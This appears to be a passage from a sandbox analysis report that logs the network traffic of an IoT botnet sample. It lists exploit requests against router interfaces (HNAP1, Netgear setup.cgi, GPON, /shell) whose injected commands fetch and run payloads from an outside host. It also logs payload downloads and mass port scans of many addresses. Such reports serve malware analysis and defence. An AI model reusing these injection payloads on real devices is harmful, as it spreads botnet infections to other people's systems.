                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 349
                            Expires: Fri, 28 Feb 2025 19:34:56 GMT
                            Date: Fri, 28 Feb 2025 19:34:56 GMT
                            Connection: close
                          • GET
                            http://23.35.51.108:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 308
                            Expires: Fri, 28 Feb 2025 19:34:56 GMT
                            Date: Fri, 28 Feb 2025 19:34:56 GMT
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.0 400 Bad Request
                            Server: AkamaiGHost
                            Mime-Version: 1.0
                            Content-Type: text/html
                            Content-Length: 308
                            Expires: Fri, 28 Feb 2025 19:34:56 GMT
                            Date: Fri, 28 Feb 2025 19:34:56 GMT
                            Connection: close
                          • GET
                            http://40.143.156.206:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 40.143.156.206:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                          • POST
                            http://40.143.156.206:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 40.143.156.206:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.1 400 Bad Request
                            Content-Type: text/html; charset=us-ascii
                            Server: Microsoft-HTTPAPI/2.0
                            Date: Fri, 28 Feb 2025 19:34:56 GMT
                            Connection: close
                            Content-Length: 311
                          • GET
                            http://40.143.156.206:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • GET
                            http://151.236.84.163:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 151.236.84.163:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:35:00 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                          • POST
                            http://151.236.84.163:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 151.236.84.163:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:35:00 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                          • GET
                            http://151.236.84.163:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:35:00 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 404 Not Found
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:35:00 GMT
                            Content-Type: text/html
                            Content-Length: 146
                            Connection: keep-alive
                          • DNS
                            Response
                            HTTP/1.1 400 Bad Request
                            Server: nginx
                            Date: Fri, 28 Feb 2025 19:35:00 GMT
                            Content-Type: text/html
                            Content-Length: 150
                            Connection: close
                          • GET
                            http://167.71.139.23:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 167.71.139.23:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                          • POST
                            http://167.71.139.23:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 167.71.139.23:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • GET
                            http://167.71.139.23:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                          • GET
                            http://201.222.102.254:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 201.222.102.254:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 404 Not Found
                            Cache-Control: no-store
                            Connection: Keep-Alive
                            Content-Length: 99
                            Content-Type: text/html
                            Date: Fri, 28 Feb 2025 19:35:12 GMT
                            Expires: 0
                            Pragma: no-cache
                            X-Frame-Options: sameorigin
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 501 Not Implemented
                            Cache-Control: no-store
                            Connection: close
                            Content-Length: 111
                            Content-Type: text/html
                            Date: Fri, 28 Feb 2025 19:35:12 GMT
                            Expires: 0
                            Pragma: no-cache
                            X-Frame-Options: sameorigin
                          • DNS
                            Response
                            (null) 400 Bad Request
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:51 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • POST
                            http://83.253.41.12:80/HNAP1/
                            Request
                            POST /HNAP1/ HTTP/1.0
                            Host: 83.253.41.12:80
                            Content-Type: text/xml; charset="utf-8"
                            SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
                            Content-Length: 640
                            Response
                            HTTP/1.0 404 Not Found
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:52 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • GET
                            http://83.253.41.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            Request
                            GET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
                            User-Agent: masjesu
                            Host: 83.253.41.12:80
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                            Connection: keep-alive
                            Response
                            HTTP/1.1 404 Not Found
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:51 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • GET
                            http://83.253.41.12:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            Request
                            GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Response
                            HTTP/1.0 404 Not Found
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:51 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                            Response
                            HTTP/1.1 400 Bad Request
                            Server: mini_httpd/1.19/bhoc 23sep2004
                            Date: Mon, 16 Feb 1970 06:13:52 GMT
                            Cache-Control: no-cache,no-store
                            Content-Type: text/html; charset=UTF-8
                            Connection: close
                          • POST
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            Request
                            POST /GponForm/diag_Form?images/ HTTP/1.1
                            Host: 127.0.0.1:80
                            Connection: keep-alive
                            Accept-Encoding: gzip, deflate
                            Accept: */*
                            User-Agent: masjesu
                            Content-Length: 118
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            http
                            3.3kB
                            114.4kB
                            57
                            85

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            http
                            3.6kB
                            114.4kB
                            66
                            85

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G
                            http
                            918 B
                            25.3kB
                            18
                            20

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4G

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            http
                            3.9kB
                            126.0kB
                            67
                            94

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            60 B
                            1
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv
                            http
                            3.7kB
                            126.0kB
                            69
                            94

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzv

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            180 B
                            3
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            http
                            3.2kB
                            106.0kB
                            58
                            78

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            180 B
                            3
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            http
                            3.3kB
                            106.0kB
                            58
                            78

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E
                            http
                            810 B
                            22.5kB
                            15
                            18

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7E

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            http
                            3.8kB
                            119.2kB
                            70
                            89

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki
                            http
                            3.4kB
                            119.2kB
                            63
                            89

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAki

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            120 B
                            2
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            180 B
                            3
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            http
                            4.4kB
                            150.9kB
                            80
                            111

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr

                            HTTP Response

                            200
                          • 37.44.238.88:80
                            http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr
                            http
                            4.4kB
                            150.9kB
                            82
                            111

                            HTTP Request

                            GET http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Upr

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            240 B
                            4
                          • 37.44.238.88:443
                            conn.masjesu.zip
                            https
                            1.2kB
                            2.0kB
                            14
                            13
                          • 37.44.238.88:80
                            http://37.44.238.88/.shell
                            http
                            331 B
                            845 B
                            5
                            5

                            HTTP Request

                            GET http://37.44.238.88/.shell

                            HTTP Response

                            200
                          • 216.126.231.240:80
                            conn.masjesu.zip
                            240 B
                            4
                          • 166.142.198.85:37215
                            60 B
                            1
                          • 106.250.89.44:37215
                            60 B
                            1
                          • 46.93.13.38:37215
                            60 B
                            1
                          • 19.25.236.3:37215
                            60 B
                            1
                          • 78.15.23.103:37215
                            60 B
                            1
                          • 135.212.236.38:37215
                            60 B
                            1
                          • 50.133.252.105:37215
                            60 B
                            1
                          • 178.163.141.187:37215
                            60 B
                            1
                          • 2.109.137.5:37215
                            60 B
                            1
                          • 95.10.38.55:37215
                            60 B
                            40 B
                            1
                            1
                          • 47.39.109.18:37215
                            60 B
                            1
                          • 194.110.158.139:37215
                            60 B
                            1
                          • 39.87.59.141:37215
                            60 B
                            1
                          • 194.43.195.3:37215
                            60 B
                            1
                          • 66.99.206.69:37215
                            60 B
                            1
                          • 187.69.206.158:37215
                            60 B
                            1
                          • 184.125.55.80:37215
                            60 B
                            1
                          • 195.252.142.195:37215
                            60 B
                            1
                          • 5.91.206.177:37215
                            60 B
                            1
                          • 217.65.185.55:37215
                            60 B
                            1
                          • 38.113.183.180:37215
                            60 B
                            1
                          • 210.54.47.138:37215
                            60 B
                            1
                          • 86.163.72.46:37215
                            60 B
                            1
                          • 172.142.38.1:37215
                            60 B
                            1
                          • 222.160.215.59:37215
                            60 B
                            1
                          • 168.169.252.220:37215
                            60 B
                            1
                          • 82.16.250.149:37215
                            60 B
                            1
                          • 193.65.73.145:37215
                            60 B
                            40 B
                            1
                            1
                          • 117.253.17.211:37215
                            60 B
                            40 B
                            1
                            1
                          • 156.68.16.88:37215
                            60 B
                            1
                          • 156.112.147.223:37215
                            60 B
                            1
                          • 92.170.160.69:37215
                            60 B
                            1
                          • 110.39.68.245:37215
                            60 B
                            1
                          • 103.212.1.46:37215
                            60 B
                            1
                          • 154.132.185.231:37215
                            60 B
                            1
                          • 165.219.144.167:37215
                            60 B
                            1
                          • 86.13.197.51:37215
                            60 B
                            1
                          • 210.1.181.166:37215
                            60 B
                            1
                          • 92.152.239.230:37215
                            60 B
                            1
                          • 95.118.50.109:37215
                            60 B
                            1
                          • 15.173.85.192:37215
                            60 B
                            1
                          • 129.242.194.225:37215
                            60 B
                            1
                          • 53.97.109.235:37215
                            60 B
                            1
                          • 67.49.1.118:37215
                            60 B
                            1
                          • 51.140.6.111:37215
                            60 B
                            1
                          • 9.54.242.108:37215
                            60 B
                            1
                          • 135.76.4.133:37215
                            60 B
                            1
                          • 176.33.178.212:37215
                            60 B
                            1
                          • 106.134.50.144:37215
                            60 B
                            1
                          • 102.3.17.51:37215
                            60 B
                            1
                          • 66.20.130.87:37215
                            60 B
                            1
                          • 187.120.151.103:37215
                            60 B
                            1
                          • 17.157.86.26:37215
                            60 B
                            1
                          • 31.28.30.190:37215
                            60 B
                            1
                          • 145.139.81.26:37215
                            60 B
                            1
                          • 110.160.239.70:37215
                            60 B
                            1
                          • 77.151.13.216:37215
                            60 B
                            1
                          • 104.24.157.51:37215
                            60 B
                            1
                          • 133.10.56.246:37215
                            60 B
                            1
                          • 168.51.0.167:37215
                            60 B
                            1
                          • 87.213.252.177:37215
                            60 B
                            1
                          • 8.186.46.133:37215
                            60 B
                            1
                          • 58.220.36.149:37215
                            60 B
                            1
                          • 31.198.162.75:37215
                            60 B
                            1
                          • 196.3.78.240:37215
                            60 B
                            1
                          • 58.163.242.92:37215
                            60 B
                            1
                          • 35.171.114.87:37215
                            60 B
                            1
                          • 45.239.182.232:37215
                            60 B
                            1
                          • 48.41.155.249:37215
                            60 B
                            1
                          • 165.48.101.200:37215
                            60 B
                            1
                          • 121.230.31.182:37215
                            60 B
                            1
                          • 14.114.5.25:37215
                            60 B
                            1
                          • 193.52.3.154:37215
                            60 B
                            1
                          • 200.191.88.44:37215
                            60 B
                            1
                          • 111.83.214.113:37215
                            60 B
                            1
                          • 39.242.70.203:37215
                            60 B
                            1
                          • 106.61.201.193:37215
                            60 B
                            1
                          • 59.223.217.17:37215
                            60 B
                            1
                          • 86.114.128.103:37215
                            60 B
                            1
                          • 31.238.67.222:37215
                            60 B
                            1
                          • 95.10.38.55:80
                            60 B
                            1
                          • 193.65.73.145:80
                            60 B
                            40 B
                            1
                            1
                          • 193.65.73.145:81
                            60 B
                            40 B
                            1
                            1
                          • 117.253.17.211:80
                            60 B
                            1
                          • 67.49.1.118:80
                            60 B
                            1
                          • 193.65.73.145:8080
                            60 B
                            40 B
                            1
                            1
                          • 193.65.73.145:52869
                            60 B
                            40 B
                            1
                            1
                          • 67.49.1.118:81
                            60 B
                            1
                          • 193.65.73.145:7574
                            60 B
                            40 B
                            1
                            1
                          • 193.65.73.145:5555
                            60 B
                            40 B
                            1
                            1
                          • 187.69.206.158:80
                            60 B
                            1
                          • 39.87.59.141:80
                            60 B
                            1
                          • 210.54.47.138:80
                            60 B
                            1
                          • 156.68.16.88:80
                            60 B
                            1
                          • 47.39.109.18:80
                            60 B
                            1
                          • 195.252.142.195:80
                            60 B
                            1
                          • 46.93.13.38:80
                            60 B
                            1
                          • 110.39.68.245:80
                            60 B
                            1
                          • 210.1.181.166:80
                            60 B
                            1
                          • 165.219.144.167:80
                            60 B
                            1
                          • 217.65.185.55:80
                            60 B
                            1
                          • 82.16.250.149:80
                            60 B
                            1
                          • 92.152.239.230:80
                            60 B
                            1
                          • 5.91.206.177:80
                            60 B
                            1
                          • 222.160.215.59:80
                            60 B
                            1
                          • 66.99.206.69:80
                            60 B
                            1
                          • 168.169.252.220:80
                            60 B
                            1
                          • 103.212.1.46:80
                            60 B
                            1
                          • 50.133.252.105:80
                            60 B
                            1
                          • 194.43.195.3:80
                            60 B
                            1
                          • 135.212.236.38:80
                            60 B
                            1
                          • 184.125.55.80:80
                            60 B
                            1
                          • 19.25.236.3:80
                            60 B
                            1
                          • 172.142.38.1:80
                            60 B
                            1
                          • 2.109.137.5:80
                            60 B
                            1
                          • 194.110.158.139:80
                            60 B
                            1
                          • 38.113.183.180:80
                            60 B
                            1
                          • 86.163.72.46:80
                            60 B
                            1
                          • 154.132.185.231:80
                            60 B
                            1
                          • 166.142.198.85:80
                            60 B
                            1
                          • 178.163.141.187:80
                            60 B
                            1
                          • 106.250.89.44:80
                            60 B
                            1
                          • 95.118.50.109:80
                            60 B
                            1
                          • 92.170.160.69:80
                            60 B
                            1
                          • 156.112.147.223:80
                            60 B
                            1
                          • 86.13.197.51:80
                            60 B
                            1
                          • 78.15.23.103:80
                            60 B
                            1
                          • 17.157.86.26:80
                            60 B
                            1
                          • 31.198.162.75:80
                            60 B
                            1
                          • 165.48.101.200:80
                            60 B
                            1
                          • 31.28.30.190:80
                            60 B
                            1
                          • 66.20.130.87:80
                            60 B
                            1
                          • 145.139.81.26:80
                            60 B
                            1
                          • 135.76.4.133:80
                            60 B
                            1
                          • 58.220.36.149:80
                            60 B
                            1
                          • 9.54.242.108:80
                            60 B
                            1
                          • 176.33.178.212:80
                            60 B
                            1
                          • 35.171.114.87:80
                            60 B
                            1
                          • 77.151.13.216:80
                            60 B
                            1
                          • 196.3.78.240:80
                            60 B
                            1
                          • 104.24.157.51:80
                            216 B
                            164 B
                            4
                            3
                          • 200.191.88.44:80
                            60 B
                            1
                          • 133.10.56.246:80
                            60 B
                            1
                          • 15.173.85.192:80
                            60 B
                            1
                          • 106.134.50.144:80
                            60 B
                            1
                          • 51.140.6.111:80
                            60 B
                            1
                          • 48.41.155.249:80
                            60 B
                            1
                          • 8.186.46.133:80
                            60 B
                            1
                          • 111.83.214.113:80
                            60 B
                            1
                          • 14.114.5.25:80
                            60 B
                            1
                          • 110.160.239.70:80
                            60 B
                            1
                          • 45.239.182.232:80
                            60 B
                            1
                          • 121.230.31.182:80
                            60 B
                            1
                          • 193.52.3.154:80
                            60 B
                            1
                          • 87.213.252.177:80
                            60 B
                            1
                          • 102.3.17.51:80
                            60 B
                            1
                          • 168.51.0.167:80
                            60 B
                            1
                          • 129.242.194.225:80
                            60 B
                            1
                          • 58.163.242.92:80
                            60 B
                            1
                          • 187.120.151.103:80
                            60 B
                            1
                          • 53.97.109.235:80
                            60 B
                            1
                          • 67.49.1.118:8080
                            60 B
                            1
                          • 193.65.73.145:49152
                            60 B
                            40 B
                            1
                            1
                          • 104.24.157.51:81
                            60 B
                            1
                          • 104.24.157.51:80
                            http://104.24.157.51:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra
                            http
                            574 B
                            623 B
                            6
                            4

                            HTTP Request

                            GET http://104.24.157.51:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra

                            HTTP Response

                            403
                          • 104.24.157.51:80
                            http://104.24.157.51:80/HNAP1/
                            http
                            1.2kB
                            623 B
                            6
                            4

                            HTTP Request

                            POST http://104.24.157.51:80/HNAP1/

                            HTTP Response

                            403
                          • 104.24.157.51:80
                            http://104.24.157.51:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1
                            http
                            487 B
                            551 B
                            6
                            4

                            HTTP Request

                            GET http://104.24.157.51:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1

                            HTTP Response

                            400
                          • 104.24.157.51:80
                            http://127.0.0.1:80/GponForm/diag_Form?images/
                            http
                            725 B
                            2.9kB
                            8
                            6

                            HTTP Request

                            POST http://127.0.0.1:80/GponForm/diag_Form?images/

                            HTTP Response

                            403
                          • 86.114.128.103:80
                            60 B
                            1
                          • 59.223.217.17:80
                            60 B
                            1
                          • 39.242.70.203:80
                            60 B
                            1
                          • 95.10.38.55:81
                            60 B
                            1
                          • 31.238.67.222:80
                            60 B
                            1
                          • 106.61.201.193:80
                            60 B
                            1
                          • 193.65.73.145:8443
                            60 B
                            40 B
                            1
                            1
                          • 117.253.17.211:81
                            60 B
                            40 B
                            1
                            1
                          • 151.153.205.182:37215
                            60 B
                            1
                          • 67.49.1.118:52869
                            60 B
                            1
                          • 117.253.17.211:8080
                            60 B
                            40 B
                            1
                            1
                          • 67.49.1.118:7574
                            60 B
                            1
                          • 86.163.72.46:81
                            60 B
                            1
                          • 195.252.142.195:81
                            60 B
                            1
                          • 217.65.185.55:81
                            60 B
                            1
                          • 82.16.250.149:81
                            60 B
                            1
                          • 187.69.206.158:81
                            60 B
                            1
                          • 165.219.144.167:81
                            60 B
                            1
                          • 178.163.141.187:81
                            60 B
                            1
                          • 166.142.198.85:81
                            60 B
                            1
                          • 19.25.236.3:81
                            60 B
                            1
                          • 106.250.89.44:81
                            60 B
                            1
                          • 156.112.147.223:81
                            60 B
                            1
                          • 66.99.206.69:81
                            60 B
                            1
                          • 172.142.38.1:81
                            60 B
                            1
                          • 5.91.206.177:81
                            60 B
                            1
                          • 194.43.195.3:81
                            60 B
                            1
                          • 210.54.47.138:81
                            60 B
                            1
                          • 2.109.137.5:81
                            60 B
                            1
                          • 38.113.183.180:81
                            60 B
                            1
                          • 103.212.1.46:81
                            60 B
                            1
                          • 168.169.252.220:81
                            60 B
                            1
                          • 95.118.50.109:81
                            60 B
                            1
                          • 86.13.197.51:81
                            60 B
                            1
                          • 47.39.109.18:81
                            60 B
                            1
                          • 50.133.252.105:81
                            60 B
                            1
                          • 92.152.239.230:81
                            60 B
                            1
                          • 194.110.158.139:81
                            60 B
                            1
                          • 154.132.185.231:81
                            60 B
                            1
                          • 110.39.68.245:81
                            60 B
                            1
                          • 210.1.181.166:81
                            60 B
                            1
                          • 92.170.160.69:81
                            60 B
                            1
                          • 184.125.55.80:81
                            60 B
                            1
                          • 39.87.59.141:81
                            60 B
                            1
                          • 46.93.13.38:81
                            60 B
                            1
                          • 156.68.16.88:81
                            60 B
                            1
                          • 78.15.23.103:81
                            60 B
                            1
                          • 135.212.236.38:81
                            60 B
                            1
